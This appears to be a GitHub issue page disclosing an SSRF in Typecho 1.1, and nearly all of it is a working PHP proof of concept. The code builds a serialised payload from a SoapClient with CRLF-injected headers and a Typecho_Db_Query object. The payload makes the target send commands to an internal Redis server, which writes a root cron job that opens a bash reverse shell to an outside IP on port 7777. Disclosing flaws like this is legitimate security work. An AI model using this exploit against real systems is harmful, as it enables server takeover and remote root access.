Open
Description
Typecho(1.1) SSRF:
Need SOAPClient of PHP,and unserialization it.
POC:
<?php
class Typecho_Db_Query{
private static $_default = array(
'action' => 'SELECT',
);
private $_adapter;
private $_sqlPreBuild;
private $_prefix;
public function __construct($adapter, $prefix){
$this->_adapter = &$adapter;
$this->_prefix = $prefix;
$this->_sqlPreBuild = self::$_default;
}
}
$target = "http://XXX.XXX.182.9:6379";
$post_string = 'set xx "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/XXX.XXX.180.248/7777 0>&1\n\n" ^^ config set dir /var/spool/cron/ ^^ config set dbfilename root ^^ save';
$headers = array(
);
$a = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '. (string)strlen($post_string).'^^^^'.$post_string,'uri'=>'hello'));
$b = serialize($a);
$b = str_replace('^^',"\n\r",$b);
$c = unserialize($b);
$query = new Typecho_Db_Query($c,'B');
$exp = array(
'adapter' => $query,
'prefix' => 'typecho_'
);
echo base64_encode(serialize($exp));
?>
Metadata
Metadata
Assignees
Labels
No labels